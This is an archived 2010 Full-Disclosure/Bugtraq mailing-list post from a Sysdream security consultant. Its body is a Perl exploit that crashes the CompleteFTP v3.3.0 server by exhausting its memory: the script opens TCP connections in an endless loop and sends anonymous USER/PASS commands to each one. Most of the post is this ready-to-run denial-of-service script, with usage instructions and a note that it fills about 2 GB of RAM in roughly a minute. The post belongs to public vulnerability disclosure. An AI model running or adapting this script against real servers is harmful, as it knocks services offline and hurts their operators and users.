| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 19 Apr 2010 13:46:02 +0200
From: "Mehdi Mahdjoub [SYSDREAM]" <m.mahdjoub@...dream.com>
To: full-disclosure@...ts.grok.org.uk,
bugtraq@...urityfocus.com
Subject: CompleteFTP v3.3.0 - Remote Memory Consumption DoS
#!/usr/bin/perl
#
# Title: CompleteFTP v3.3.0 - Remote Memory Consumption DoS
# Author: Jonathan Salwan <j.salwan@...dream.com>
# Web: http://www.shell-storm.org | http://www.sysdream.com
#
#
# Advisories: http://www.sysdream.com/article.php?story_id=331§ion_id=78
#
# ~60 sec for satured ~2Go RAM
#
use IO::Socket;
print "\n[x]CompleteFTP v3.3.0 - Remote Memory Consumption DoS\n";
if (@ARGV < 1)
{
print "[-] Usage: <file.pl> <host> <port>\n";
print "[-] Exemple: file.pl 127.0.0.1 21\n\n";
exit;
}
$ip = $ARGV[0];
$port = $ARGV[1];
$login = "USER anonymous\r\n";
$pwd = "PASS anonymous\r\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connecting: Failed!\n";
print "Please Wait...\n";
while(){
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port");
$socket->recv($answer,2048);
$socket->send($login);
$socket->send($pwd);
}
--
Mehdi Mahdjoub
Consultant Sysdream IT Security
Responsable communication
Webmaster
Sysdream
4 Impasse de la gendarmerie
93400 Saint Ouen
France
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists